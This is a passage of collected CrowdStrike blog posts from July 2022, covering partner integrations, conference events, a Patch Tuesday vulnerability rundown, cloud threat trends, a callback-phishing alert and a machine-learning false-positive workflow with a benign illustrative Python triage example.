The CrowdStrike Store team will cover these new integrations and guide you in selecting the right IT and security tools for truly empowering and securing your organization in our upcoming CrowdCast, Unifying Your Security Solutions: The Ultimate Guide to Selecting the Right Tools with the CrowdStrike Store. Join the session to learn about the essentials of building a modern IT and security stack with unified tools that accelerate your security team’s efficiency and efficacy.

Have OS Patching and Full Disk Encryption at Your Fingertips with JumpCloud

The increase of heavily distributed environments has made it difficult for organizations to secure their widespread remote workers and ensure they are operating on trusted, encrypted and up-to-date devices. With this complicated dispersed environment, teams lack visibility, making it hard for them to understand the status of device security and ensure coverage across multiple operating systems. To add to this, without holistic visibility and control of devices, meeting audit and compliance standards will likely become impossible.

JumpCloud, a CrowdStrike Falcon Fund partner, recently released a new application in the CrowdStrike Store that enables teams by providing OS patching and full disk encryption at their fingertips. With CrowdStrike and JumpCloud, users can easily leverage rich endpoint data and capabilities to control and secure dispersed devices. By centralizing device management through the JumpCloud Directory Platform, your team can easily implement enhanced security without friction. 

JumpCloud integrates with CrowdStrike Falcon Real Time Response (RTR) commands to help you automate OS patching from a single interface to keep every device up to date with customizable user notifications and device specific groups. JumpCloud also leverages CrowdStrike’s enriched endpoint telemetry to help provide additional environmental context, enabling secure devices with full disk encryption across your entire fleet. By easily tracking which devices were updated or encrypted, and any permission changes with out-of-the-box logging and reporting, you can ensure your organization is compliant. 

The JumpCloud agent can be simply deployed to Windows devices through the CrowdStrike Falcon® console, drastically cutting implementation time and helping you realize value faster.

Elevate Your Security with New Technology Integrations 

CrowdStrike has also expanded its ecosystem with new technology integrations built by Asimily, Beyond Identity and SafeBreach that leverage the Falcon platform to help unify your tools, get a higher return on your investments and enable a holistic security strategy. 

Asimily, a risk management platform for IoT devices and web-connected equipment, integrates by ingesting and querying CrowdStrike’s rich threat intelligence data to then correlate with its anomaly alerts and threat insights, providing you with layered visibility and additional threat context surrounding indicators of compromise (IOCs) across your environment. 

Beyond Identity integrates with the Falcon platform and leverages CrowdStrike’s Zero Trust Assessment (ZTA) score to help your team continuously monitor and enforce risk-based access policies using granular user and device signals. By checking the presence and state of the Falcon sensor and a device’s ZTA score, you can easily block access or quarantine a device during an authentication session for enhanced Zero Trust.

Finally, SafeBreach’s breach and attack simulation solution integrates with the Falcon platform and Falcon X to provide automatically correlated simulated attacks and layered visibility into the performance of security controls to help harden your organizational posture. 

With these new additions to the CrowdStrike ecosystem, you can more easily integrate tools across your stack to remove operational friction and improve your security team’s visibility across distributed environments.

Build Your Modern Security Stack with the CrowdStrike Store

To effectively address evolving adversary tactics, limited resources and a lack of visibility caused by siloed technology, organizations must empower their teams with the best unified tools to accelerate efficiency and efficacy at scale. To help you find the right tools that enable your business to more quickly realize value, the CrowdStrike Store provides easy access to a best-of-breed ecosystem of CrowdStrike products and partner integrations that minimize implementation complexity and empower the unification of IT and security stacks. By pairing CrowdStrike’s unified platform with partner solutions, you can eliminate blind spots and ensure that your organization has true end-to-end coverage of the entire threat landscape to stop breaches.

Learn more about how you can select the best tools to unify your stack and address your unique use cases by joining the CrowdStrike Store team’s CrowdCast on July 27. You’ll get key tips for choosing the right IT and security solutions to empower and secure your entire organization, and an inside look at new additions to the CrowdStrike ecosystem.


Think It, Build It, Secure It — CrowdStrike at AWS re:Inforce 2022

19 July 2022 at 17:39

For two days in July, Boston will be the epicenter of innovation in the world of cloud security — and we’re excited to see you there in person! As a proud sponsor of AWS re:Inforce 2022 (July 26-27), CrowdStrike is coming to town to meet with customers, partners and prospects to show how we’re protecting cloud environments against increasing adversary attacks. 

Adversary attacks on cloud environments have grown more aggressive and damaging. Adversaries view the cloud as a soft target, rife with vulnerabilities and misconfigurations to exploit. Stopping cloud breaches requires a comprehensive, platform approach to security that combines the power of agent-based and agentless protection that covers all workloads. 

We have a host of activities planned to help you better understand your cloud risk and how CrowdStrike’s adversary-focused approach to cloud security can keep you ahead of advancing attacks. We’ll be hosting speaking sessions, showing off new products, and providing one-on-one expert insight on the greatest risks your cloud environments face. Most importantly you’ll learn how to mitigate those risks with the CrowdStrike Falcon® platform.

We hope you’ll have a chance to stop by to visit us at Booth #203 to talk to our experts, see our demos, and even register to win one of our new limited-edition adversary figures! 

Visit CrowdStrike at Booth #203

The CrowdStrike experience will feature in-depth demos, theater presentations, partner highlights and cybersecurity experts on standby to discuss the latest insights into the threat landscape and how CrowdStrike is helping organizations around the world defend against attack. 

Featured Demo Stations

As organizations extend their infrastructure and move to the cloud, adversaries are finding security gaps. In the CrowdStrike 2022 Global Threat Report, our experts reported that organizations face malicious threats to cloud environments as cloud-based services are “increasingly abused by malicious actors … a trend that is likely to continue in the foreseeable future as more businesses seek hybrid work environments.”

At AWS re:Inforce 2022, we’ll show you how to stop cloud breaches through live-action demonstrations of the Falcon platform. CrowdStrike will curate demonstrations that allow you to experience how our cloud security products work in an actual AWS environment and with the AWS console. Our experts are ready to meet and discuss your biggest needs when it comes to cloud, including: 

  • How we integrate our container image scanning features with a DevOps pipeline
  • How a DevOps pipeline builds a container image and pushes it to an ECR registry
  • How a DevOps pipeline deploys an application to an EKS cluster using a container image from an ECR registry
  • How we deploy our container sensor to an EKS cluster to provide protection for vulnerable applications

The Partner Hour

CrowdStrike’s unique cybersecurity partner ecosystem helps simplify your security stack and protect your entire organization from modern adversaries with unified, trusted security solutions to solve real-world security and IT challenges. 

Join us at the Partner Hour hosted every day during AWS re:Inforce to learn how WE STOP BREACHES together with our partners.  

Featured partners will be: 

  • 10:00 a.m. — Netskope: Better Together to Continuously Enforce Zero Trust
  • 10:30 a.m. — ExtraHop: Empower XDR with Network Intelligence
  • 1:00 p.m. — Okta: Simplify Secure Remote Access
  • 1:30 p.m. — Zscaler: Endpoint to Application: Protected
  • 3:00 p.m. — Presidio/AWS: Mitigating Ransomware
  • 3:30 p.m. — Cloudflare: Enhancing and Expanding Zero Trust

Get Your Own Adversary Figure 

Scoring your own limited-edition CrowdStrike adversary figure is easy as 1-2-3. First, get a collectable adversary card when you complete each of the following steps:

  1. Listen to a theater presentation at the CrowdStrike booth 
  2. Engage in a product demo at one of our demo stations
  3. Snap a selfie and tag #GoCrowdStrike (we’ll have adversary masks in the booth for you to wear)

Then show your three adversary cards to a CrowdStrike representative in our booth, and you’ll be rewarded with your very own adversary figure while supplies last!

Meet 1:1 with a CrowdStrike Executive

CrowdStrike executives and leaders will be attending AWS re:Inforce 2022 in person. If you’re interested in a 1:1 onsite meeting, please complete this form.

Attend the CrowdStrike Chalk Talk Session

As organizations have embraced the cloud revolution, so too have today’s adversaries. Defending the cloud requires securing a rapidly growing attack surface. IT and security teams must enforce continuous monitoring and security, from the development process to runtime. 

Join our Chalk Talk session where CrowdStrike and AWS experts will outline three steps to mitigate cloud security threats using an adversary-focused approach:

  • Shift left and enrich CI/CD processes to detect threats and vulnerabilities before they reach production
  • Provide real-time protection across the control plane
  • Secure hosts and containers at runtime

Session: Three Steps to Mitigate Cloud Threats with CrowdStrike and AWS

When: July 26, 2:45-3:45 p.m. 

Where: Room 203

Speakers

  • Justin Harris, Staff Cloud Solution Architect, CrowdStrike
  • Sameer Vasanthapuram, Principal Product Manager, CrowdStrike
  • Patrick McDowell, Global Technical Lead, Security Partners, AWS

Join Us at the Cloud Security Mixer

Join CrowdStrike, Netskope, ExtraHop and Okta for refreshments and delicious food and to network with peers after Day 1 of AWS re:Inforce, just steps away from the Boston Convention Center.  

Register now — space is limited! 

When: Tuesday, July 26, 5:00-8:00 p.m. ET

Where: M.J. O’Connor’s, The Westin-Boston Floor 1, 425 Summer Street, Boston, MA 02210 

Learn More and Register Today

For more information about AWS re:Inforce 2022 and to register to attend, click here.


CrowdStrike’s Adversary Universe World Tour: Coming to a City Near You!

19 July 2022 at 14:43

And we’re off! The CrowdStrike Adversary Universe® World Tour (AUWT) kicked off with a standing-room-only event in Brisbane, Australia on July 12, 2022, followed by another full house in Melbourne on July 18. We’re excited to begin this tour and share insights from CrowdStrike’s elite threat intelligence and security experts with customers around the world.

In the coming weeks and months, our experts will share secrets of the Adversary Universe to give attendees the insight required to defend against adversaries’ constantly evolving tradecraft. Attendees will gain a stronger understanding of the growing enterprise attack surface into the cloud, learn how CrowdStrike helps defend against threats to stop breaches, and hear from our customers about their own perspectives and experiences in fighting today’s threats.

Adversary Universe World Tour: Brisbane, Australia

A Deep Dive Into the Adversary Universe

The AUWT, presented in collaboration with AWS, will show attendees what they need to know to stop the adversaries targeting their organizations. Our experts will answer your most pressing questions: Who are these adversaries? What are their unique motivations? How are they breaking in? And — most importantly — how can they be stopped? 

An adversary-focused approach is essential to defend against the evolving techniques of today’s eCrime, nation state, and hacktivist groups. Organizations operating in different regions of the world sometimes face different threats — which is why we’re bringing this incredible knowledge to you! As we visit cities around the globe, attendees will learn about region-specific threats. Our experts will discuss which industries adversaries prioritize in your region, and the tactics they employ, to keep you a step ahead of these attacks.

We’ll also explore how adversaries seek to disrupt digital transformation by targeting cloud environments. As critical applications and data move to the cloud, adversaries are increasing their attacks and refining tradecraft to exploit vulnerabilities, steal credentials or host malware command-and-control — among other nefarious activities. Understanding these motivations and techniques is the foundation of an adversary-focused approach to security. 

But this critical intelligence is just part of what the AUWT is bringing to you!

Demonstrating the Critical Capabilities Required to Defeat Today’s Adversaries  

Combating today’s adversaries and stopping breaches requires an integrated approach that delivers strong Zero Trust protection across three critical layers: the device layer, the identity layer and the data layer. But this defense-in-depth approach has to work for your organization and users — not against you. Fighting the adversary cannot compromise your productivity.

CrowdStrike has set the bar by providing customers with the industry’s leading platform for unified threat prevention, detection, hunting, intelligence and remediation — all delivered through a single lightweight agent. At each stop on the tour, we’ll demonstrate how the CrowdStrike Falcon® platform is easy to deploy, easy to manage and highly effective at combating adversaries without interfering with users or productivity.

We’ll also unveil and dig deep into our latest innovations, designed to strengthen your security and keep you ahead of today’s threats. Here’s just a taste of some innovations we’ll showcase: 

  • Unified, agent-based and agentless cloud security: CrowdStrike’s cloud-native Falcon platform was built to give organizations comprehensive visibility, detection and remediation capabilities to secure their cloud infrastructure. On the AUWT, we’ll demonstrate why CrowdStrike is the only company to deliver an agent-based and agentless approach to cloud security that provides the flexibility needed to protect cloud environments.
  • Modern identity protection: Adversaries are increasingly using stolen credentials to bypass legacy defenses, masquerade as legitimate users and advance their attacks. Stopping the adversary requires the ability to stop identity-based attacks. Attendees will learn why identity and endpoint protection are better together — and how CrowdStrike is delivering these powerful capabilities through a unified platform approach.
  • Falcon XDR: Beyond the endpoint: The endpoint is the epicenter of enterprise risk and the modern battleground against today’s adversaries. But as attackers evolve their tactics, organizations need to extend detections beyond the endpoint to stop adversaries where they land. We’ll show you how CrowdStrike is extending the industry’s leading endpoint protection and supercharging detection and response across your security stack. We’ll show off major new innovations like the native automation capabilities of Falcon Fusion.

Most important of all, we’ll demonstrate how CrowdStrike continues to deliver the industry’s most powerful protection through an elegant, unified platform that eliminates friction and drives productivity. We’re also excited to show you how our elite team of experts use and manage this technology for customers struggling to fill their security skills gap. CrowdStrike stands alone in the combination of best-in-class technology and the world’s foremost experts in threat hunting and incident response.

CrowdStrike’s Adam Meyers gives a keynote at the AUWT stop in Melbourne, Australia

Upcoming AUWT Events

The AUWT will visit 70 cities around the world. Next up, we’ll continue the tour in Canberra, Australia before traveling to the United States, New Zealand, Malaysia, Singapore, Germany, France, England, Turkey, South Africa, Colombia, Brazil, Chile and several other global destinations in the coming months.

Interested in joining an AUWT event? Below are the cities next on our list, with more to be confirmed in the coming weeks. Hope to see you there!

  • July 20: Canberra, Australia
  • July 21: Charlotte, North Carolina, United States
  • July 22: Sydney, Australia
  • July 26: Tampa, Florida, United States
  • August 3: Auckland, New Zealand
  • August 10: Manila, Philippines
  • August 18: Kuala Lumpur, Malaysia
  • August 23: Nashville, Tennessee, United States
  • August 25: Singapore, Singapore
  • September 13: Istanbul, Turkey
  • September 14: Frankfurt, Germany
  • September 14: Jakarta, Indonesia
  • September 15: Johannesburg, South Africa
  • September 20: Vienna, Austria
  • September 22: Zurich, Switzerland

To find and register for an Adversary Universe World Tour event, you can visit the event website.

Johanna Flower is Interim Chief Marketing Officer at CrowdStrike.


July 2022 Patch Tuesday: Four Critical CVEs and a Zero-Day Bug Under Active Exploitation

14 July 2022 at 19:51

Microsoft has released 84 security patches for its July 2022 Patch Tuesday rollout. Four vulnerabilities are rated Critical in severity and the rest are classified as Important, with one (CVE-2022-22047) under active exploitation. In this blog, the CrowdStrike Falcon Spotlight™ team offers an analysis of this month’s vulnerabilities, as well as insights into the vulnerabilities and patches affecting Microsoft products in the first half of this year. We highlight the CVEs in this month’s update that are most severe and recommend how to prioritize patching.

July 2022 Risk Analysis

The top three attack types — elevation of privilege, remote code execution (RCE) and information disclosure — continue to dominate, with denial of service following at almost 6%.

Figure 1. Breakdown of July 2022 Patch Tuesday attack types

Microsoft Windows received the most patches this month, with Extended Security Updates (ESUs) following close behind. There are also patches for 33 Azure vulnerabilities this month and a couple for Microsoft Office products.

Figure 2. Breakdown of July 2022 Patch Tuesday affected product families

Zero-Day CSRSS Vulnerability Under Active Exploitation

CVE-2022-22047 is listed as being under active attack, but there’s no information from Microsoft on where, or how widely, the vulnerability is being exploited. This vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which are now disabled by default.

Rank CVSS Score CVE Description
Important 7.8 CVE-2022-22047 Windows CSRSS Elevation of Privilege

CrowdStrike recommends that you monitor your environment to see if it is affected by this vulnerability and apply the fix offered. For CrowdStrike customers using Falcon Spotlight, this CVE is ranked as Critical.

Critical Vulnerabilities in Network File System and RPC

Four vulnerabilities ranked as Critical received patches this month. Affected products are Remote Procedure Call (RPC), Windows Network File System (NFS) and Windows Graphics Component. Let’s review a couple of these vulnerabilities and how they could affect an organization’s environment.

CVE-2022-22038: This vulnerability could allow a remote, unauthenticated attacker to execute code on an affected system. The bulletin does not state what privileges that code would run with, but the assumption is that they would be elevated. Remote, unauthenticated code execution with elevated privileges adds up to a potentially wormable bug. Microsoft rates the attack complexity as high because an attacker would need to make “multiple exploitation attempts” to succeed, but unless you are actively monitoring or blocking RPC activity, you may not see those attempts. If the attack complexity were rated low, as some would argue it should be since the attempts could easily be scripted, the CVSS score would be 9.8 rather than 8.1. CrowdStrike recommends that you test and deploy this patch quickly.

CVE-2022-22029: This is the third month in a row with a Critical-rated NFS vulnerability. While this one carries a lower CVSS score than the NFS vulnerabilities patched in the previous two months, it could still allow a remote, unauthenticated attacker to execute code on an affected system with no user interaction. Microsoft notes that multiple exploit attempts may be required, but unless you are specifically auditing for this, you may not notice them. If you are running NFS, do not ignore this patch.

Rank CVSS Score CVE Description
Critical 8.8 CVE-2022-30221 Windows Graphics Component Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-22038 Remote Procedure Call Runtime Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-22029 Windows Network File System Remote Code Execution Vulnerability
Critical 7.5 CVE-2022-22039 Windows Network File System Remote Code Execution Vulnerability

Important Azure Site Recovery Service Vulnerabilities

Based on the total count of Azure vulnerabilities addressed this month, this set of CVEs should be prioritized. Azure Site Recovery is primarily a cloud-based service, but it has on-premises components, and those components are not updated automatically, so administrators must upgrade them themselves. Microsoft recommends upgrading to version 9.49 to remediate these vulnerabilities. Instructions can be found in this article. It is incredibly unusual to see so many CVEs addressed in a single month for a single component.

Rank CVSS Score CVE
Important 8.3 CVE-2022-33674
Important 7.8 CVE-2022-33675
Important 7.2 CVE-2022-33677
Important 7.2 CVE-2022-33676
Important 7.2 CVE-2022-33678
Important 6.5 CVE-2022-30181
Important 6.5 CVE-2022-33641
Important 6.5 CVE-2022-33643
Important 6.5 CVE-2022-33655
Important 6.5 CVE-2022-33656
Important 6.5 CVE-2022-33657
Important 6.5 CVE-2022-33661
Important 6.5 CVE-2022-33662
Important 6.5 CVE-2022-33663
Important 6.5 CVE-2022-33665
Important 6.5 CVE-2022-33666
Important 6.5 CVE-2022-33667
Important 6.5 CVE-2022-33672
Important 6.5 CVE-2022-33673
Important 4.9 CVE-2022-33642
Important 4.9 CVE-2022-33650
Important 4.9 CVE-2022-33651
Important 4.9 CVE-2022-33653
Important 4.9 CVE-2022-33654
Important 4.9 CVE-2022-33659
Important 4.9 CVE-2022-33660
Important 4.9 CVE-2022-33664
Important 4.9 CVE-2022-33668
Important 4.9 CVE-2022-33669
Important 4.9 CVE-2022-33671
Important 4.4 CVE-2022-33652
Important 4.4 CVE-2022-33658

Falcon Spotlight provides the visibility SecOps teams need to quickly identify which vulnerabilities are prevalent in your organization’s environment. Since Falcon Spotlight is completely integrated within the CrowdStrike Falcon® platform, IT staff are able to take swift action by isolating potentially compromised hosts from exploited vulnerabilities. Additionally, the Falcon platform mitigates the risk from vulnerabilities that cannot be patched rapidly by detecting and automatically preventing exploitation attempts and post-exploitation activity.

Managing Vulnerabilities Is Ultimately about the Long Game

As evident in these monthly patch rollouts, no product is safe from vulnerabilities. Attackers will use any weakness to gain access, exploit flaws and move laterally to take advantage of your organization. While prioritization and patching are vital for immediately addressing critical issues, what makes a vulnerability management program successful is planning for the long term.

When your organization is planning for the long term, reviewing everything within your environment is important. Patching should not be done in a vacuum. It requires open communication with other parts of your cybersecurity organization and cross-collaboration with IT hygiene, threat intelligence and compliance teams to fully understand which areas of risk your organization might be exposed to and which types of threats or attackers are most likely to take advantage of them.

Organizations rely on full-suite platforms that offer comprehensive solutions to do this in a timely manner. Your staff should be able to make accurate and actionable recommendations based on any kind of suspicious activity surrounding the assets and entities in your environment while having access to relevant contextual data to provide the insight needed to make appropriate decisions to protect your environment. CrowdStrike stands resolutely behind this. When we say “We stop breaches,” we offer a holistic approach to creating a defensible security posture — and we do it in a way that is relevant, timely and accessible to all who are responsible for keeping your defenses strong. Beyond Falcon Spotlight, we suggest you try our Falcon platform to see how CrowdStrike can enable your team for success.

Learn More

This video on Falcon Spotlight™ vulnerability management shows how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization.

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article.

Additional Resources

  • Learn more about vulnerabilities that can affect your environment at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • See how Falcon Spotlight can help you discover and manage vulnerabilities in your environments. 
  • Read how CrowdStrike Asset Graph works in conjunction with Falcon Discover to offer you advanced insights on how suspicious activity is related to other assets within your environment. 
  • Learn how Falcon Identity Protection products can stop workforce identity threats faster. 
  • Download the CrowdStrike 2022 Global Threat Report to learn who and what is affecting your environment.
  • Make prioritization painless and efficient. Watch how Falcon Spotlight enables IT staff to improve visibility with custom filters and team dashboards.
  • Test CrowdStrike next-gen AV for yourself with a free trial of Falcon Prevent™.

Top Threats You Need to Know to Defend Your Cloud Environment

11 July 2022 at 00:01

The CrowdStrike eBook, “Protectors of the Cloud: Combating the Rise in Threats to Cloud Environments,” reveals how adversaries target and infiltrate cloud environments and recommends best practices for defense.

As organizations move critical applications and data to the cloud, these resources have come under increasing attack. Adversaries view cloud environments as soft targets and continue to refine tactics and tradecraft to exploit the vulnerabilities and misconfigurations within them. 

Though this attack trend was underway before the COVID-19 pandemic, the need to support mostly remote, distributed workforces increased organizations’ reliance on cloud resources — which in turn amplified adversaries’ focus on exploiting the cloud. Attackers were circling throughout 2021, often attempting to compromise cloud infrastructure and assets by exploiting misconfigurations and stolen user credentials. 

In “Protectors of the Cloud: Combating the Rise in Threats to Cloud Environments,” we outline common attack vectors adversaries use to breach cloud environments, including credential theft, vulnerability exploitation, abuse of cloud service providers, exploitation of misconfigured image containers, and use of cloud services for hosting malware and command and control. 

Additionally, you will learn:

  • How state-sponsored adversaries, such as COZY BEAR, target IT and cloud service providers to exploit trusted relationships and supply chain partners 
  • How sophisticated adversaries harvest, then exploit stolen credentials and identities to amplify ransomware big game hunting (BGH) attacks and infiltrate cloud environments
  • How malicious actors intensify attacks on critical cloud infrastructure by exploiting misconfigured image containers and targeting vulnerabilities
  • How adversaries target neglected cloud infrastructure slated for retirement that still contains sensitive data
  • Which best practices cloud security experts recommend for defending cloud infrastructure

Adversaries Seek to Exploit Trust in the Cloud 

The ebook shows how, in addition to credential theft and vulnerability exploitation, adversaries leverage cloud service providers in an attempt to abuse the trust between these service providers and their customers. In doing so, the adversary seeks access to additional targets through lateral movement from cloud-hosted enterprise authentication assets. If an adversary can elevate their privileges to global administrator levels, they may be able to pivot between related cloud tenants to expand their access. Other covered adversarial tactics and trends include exploiting misconfigured image containers and using legitimate cloud services to host malware and perform command and control activities.

The ebook also describes the tactics of two significant threat groups, FANCY BEAR and COZY BEAR, that are Russian in origin and target cloud services as part of their strategy. 

  • In 2021, FANCY BEAR targeted numerous cloud-based email providers — including Microsoft O365 and webmail services likely to be used by individuals — using a variety of tactics. Credential theft is a critical part of FANCY BEAR’s strategy, which serves as a reminder that organizations should focus on anti-phishing technologies and user awareness training to aid the identification of phishing emails and other credential-stealing techniques. 
  • COZY BEAR has demonstrated extensive knowledge of cloud service infrastructure and administration as well as the use of extensive operational security methods to reduce their chances of being detected.

Given threat actors’ increasing focus on attacking the cloud, CrowdStrike takes an adversary-focused approach that unifies on-premises and cloud security by combining capabilities such as cloud security posture management and cloud workload protection for multicloud environments with the latest threat intelligence. As adversaries grow more sophisticated, protecting cloud assets will likely become more complex. Battling these adversaries will require a comprehensive approach to security that enables organizations to maintain compliance, visibility and enforcement regardless of where their data and applications reside.

Callback Malware Campaigns Impersonate CrowdStrike and Other Cybersecurity Companies

Today CrowdStrike sent the following Tech Alert to our customers:

On July 8, 2022, CrowdStrike Intelligence identified a callback phishing campaign impersonating prominent cybersecurity companies, including CrowdStrike. The phishing email implies the recipient’s company has been breached and insists the victim call the included phone number. This campaign leverages similar social-engineering tactics to those employed in recent callback campaigns including WIZARD SPIDER’s 2021 BazarCall campaign.

This campaign will highly likely include common legitimate remote administration tools (RATs) for initial access, off-the-shelf penetration testing tools for lateral movement, and the deployment of ransomware or data extortion.

Details

The callback campaign employs emails that appear to originate from prominent security companies; the message claims the security company identified a potential compromise in the recipient’s network. As with prior callback campaigns, the operators provide a phone number for the recipient to call (Figure 1).

Figure 1. Example of CrowdStrike-Themed Phishing Email

Historically, callback campaign operators attempt to persuade victims to install commercial RAT software to gain an initial foothold on the network. For example, CrowdStrike Intelligence identified a similar callback campaign in March 2022 in which threat actors installed AteraRMM followed by Cobalt Strike to assist with lateral movement and deploy additional malware. 

Assessment

While CrowdStrike Intelligence cannot currently confirm the variant in use, the callback operators will likely use ransomware to monetize their operation. This assessment is made with moderate confidence, as 2021 BazarCall campaigns would eventually lead to Conti ransomware — though this ransomware-as-a-service (RaaS) recently ceased operations. This is the first identified callback campaign impersonating cybersecurity entities and has higher potential success given the urgent nature of cyber breaches.

CrowdStrike will never contact customers in this manner.

Any customers receiving an email such as those in this Alert should forward phishing emails to [email protected]

How CrowdStrike’s Machine Learning Model Automation Uses the Cloud to Maximize Detection Efficacy

1 July 2022 at 13:41

  • The CrowdStrike Falcon® platform takes full advantage of the power of the CrowdStrike Security Cloud to reduce high-cost false positives and maximize detection efficacy to stop breaches 
  • CrowdStrike continuously explores novel approaches to improve machine learning automated detection and protection capabilities for Falcon customers
  • CrowdStrike’s cloud-based machine learning model automation can predict 500,000 feature vectors every second and cover 10TB of files per second to find detections

At CrowdStrike, we combine cloud scale with machine learning expertise to improve the efficacy of our machine learning models. One method for achieving that involves scanning massive numbers of files that we may not even have in our sample collections before we release our machine learning models. This prerelease scan allows us to maximize the efficacy of our machine learning models while minimizing negative impact of new or updated model releases.

It’s important to understand that machine learning models take over when discrete algorithms fall short. CrowdStrike machine learning does an excellent job of creating models that can detect impactful in-the-wild novel threats like NotPetya, BadRabbit or HermeticWiper along with other malware families. CrowdStrike’s comprehensive detection capabilities have been consistently validated in independent third-party testing from leading organizations including AV-Comparatives. However, machine learning looks at the world through probabilities, and those probabilities can make it unpredictable and difficult to understand why an incorrect detection was made.

Incorrect detections, also known as false positives, are a concern with any endpoint security solution and exacerbate the ongoing skills shortage most organizations face. Any incorrect assessment of a clean file as malicious can immediately trigger remediation procedures that can take down services, disrupt workflows and distract analysts from hunting down legitimate threats. However, not all false positives are created equal, as the cost of each mistake should be weighed against the benefit provided by correct detections. CrowdStrike has implemented novel solutions to the false positive predicament.

Clean or Dirty: Know the Difference

One approach involves accumulating billions of files in our cloud. These files come from various sources, ranging from protected environments to public malware collections, at a rate of approximately 86 million new hashes a day. The collection includes malicious code, clean code and unwanted code, such as potentially unwanted programs. 

To build our machine learning models, we carefully curate both clean and “dirty” (i.e., malicious) samples from this collection, resulting in a labeled collection that is growing by tens of millions of new examples every training cycle.

Extract the Right Features

To ensure the quality of the resulting models, we also gather from live environments the most interesting files to maximize the efficacy of the model. While some customers use the Falcon platform to share files with us so we can improve our coverage capabilities, others keep their files in-house for a variety of reasons. As a consequence, to build an effective model, we must ensure that it can perform well on in-house files not shared with us as well as on those that have been shared. However, to teach a machine learning model, first you must reduce these interesting files to a long list of transformed numeric values, called a feature vector, that represent various properties of the file. 

As humans, we learn to use our senses to extract features from the surrounding environment and then infer probable outcomes based on past experience. For example, if it’s cloudy outside and there’s a damp breeze, we infer there’s a high chance of rain and we need to grab an umbrella. In this case, cloudy and damp can be considered data points that are part of the feature vector describing the chance of rain. 

Of course, the feature list for files contains thousands of decimal numbers that humans can’t read but our artificial intelligence (AI) understands. That feature vector is uploaded to the cloud by the Falcon sensor, making it possible for us to observe what a new model would say about the underlying file by running predictions over that stored feature vector.

Figure 1. This flow describes how feature vectors and metadata are sent to the CrowdStrike Security Cloud and used against our machine learning model to help build better predictions.

Returning to the rain example, the feature vector with the two data points of cloudy and damp is assessed against what we know from experience to be signs of rain. If our experience has taught us that these two particular data points have a high probability of describing chances of rain, then we grab an umbrella. Otherwise, we assess this with low chances of rain. Much like machine learning models, it comes down to how well we are trained in spotting and recognizing signs of rain.

Measure Efficacy, Get It Right!

The same file feature vector can also be combined with additional information, such as the file prevalence data contained within our Security Cloud. This means we can virtually scan all prevalent files in protected environments to measure efficacy and test for false positives. 

The results of this virtual scan are important for a number of reasons. First, it enables us to identify important files which will have a high impact in the next model release.  Second, we can minimize potential high-cost false positives prior to deployment.  Finally, this information is used to teach future models. 

For example, based on a prevalence threshold, we advance our scan to include all files found on a significant number of devices. We then consider all of our detections. Those that are incorrect we resolve with our cloud by replying to our sensors to prevent future detection, and include the files that triggered an incorrect detection in the next retrain of our model. Correct detections, on the other hand, are added both to our cloud for immediate detection and to the files used in training our models in the future. 
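The prerelease "virtual scan" described above, as an added example that is not CrowdStrike's code: stored feature vectors are scored by a candidate model, only files above a prevalence threshold are considered, each incorrect detection is weighted by its prevalence (the cost it would carry if shipped), and results are split into sensor exclusions, cloud detections and retraining sets. The feature vectors, prevalence counts, labels and toy logistic model weights are all constructed for illustration.

```python
"""Prerelease virtual scan of stored feature vectors against a candidate model.

Hypothetical example, not CrowdStrike's implementation: the files, labels and
model parameters below are constructed to show the workflow, not real data.
"""
from dataclasses import dataclass, field
from typing import List, Optional
import math


@dataclass
class StoredFile:
    sha256: str                 # constructed placeholder, not a real hash
    features: List[float]       # constructed feature vector, as a sensor would upload it
    prevalence: int             # number of protected devices the file was seen on
    label: Optional[str]        # "clean", "dirty", or None when not yet curated


@dataclass
class ScanResult:
    exclusions: List[str] = field(default_factory=list)        # "do not detect" replies to sensors
    cloud_detections: List[str] = field(default_factory=list)  # correct detections to serve now
    retrain_clean: List[str] = field(default_factory=list)     # clean files the model got wrong
    retrain_dirty: List[str] = field(default_factory=list)     # dirty files, detected or missed
    needs_review: List[str] = field(default_factory=list)      # unlabeled detections for analysts
    weighted_fp_cost: int = 0   # sum of prevalence over false positives


def score(weights: List[float], bias: float, features: List[float]) -> float:
    """Probability that a file is malicious under a toy logistic model (stand-in for a real one)."""
    z = bias + sum(w * x for w, x in zip(weights, features))
    return 1.0 / (1.0 + math.exp(-z))


def virtual_scan(files: List[StoredFile], weights: List[float], bias: float,
                 threshold: float = 0.5, prevalence_min: int = 100) -> ScanResult:
    """Score every sufficiently prevalent file and triage the candidate model's detections."""
    result = ScanResult()
    for f in files:
        if f.prevalence < prevalence_min:
            continue  # rare files carry little deployment risk; skip them in this pass
        detected = score(weights, bias, f.features) >= threshold
        if f.label == "clean":
            if detected:
                # Incorrect detection: suppress it in the cloud now and teach the next model.
                result.exclusions.append(f.sha256)
                result.retrain_clean.append(f.sha256)
                result.weighted_fp_cost += f.prevalence
        elif f.label == "dirty":
            # Correct detections go live immediately; misses still feed the next retrain.
            if detected:
                result.cloud_detections.append(f.sha256)
            result.retrain_dirty.append(f.sha256)
        elif detected:
            result.needs_review.append(f.sha256)  # detection on a file nobody has labeled yet
    return result


def release_gate(result: ScanResult, max_weighted_fp_cost: int) -> bool:
    """True when the candidate model's prevalence-weighted false-positive cost is within budget."""
    return result.weighted_fp_cost <= max_weighted_fp_cost


# Constructed toy model parameters and sample store.
WEIGHTS, BIAS = [1.5, -2.0, 0.8], -0.5
SAMPLE_FILES = [
    StoredFile("hash-A", [2.0, 0.1, 1.0], prevalence=5000, label="clean"),  # high-cost false positive
    StoredFile("hash-B", [2.5, 0.0, 0.0], prevalence=3, label="clean"),     # would misfire, but too rare
    StoredFile("hash-C", [1.0, 0.0, 2.0], prevalence=400, label="dirty"),   # correct detection
    StoredFile("hash-D", [0.0, 2.0, 0.0], prevalence=900, label="dirty"),   # miss: retrain only
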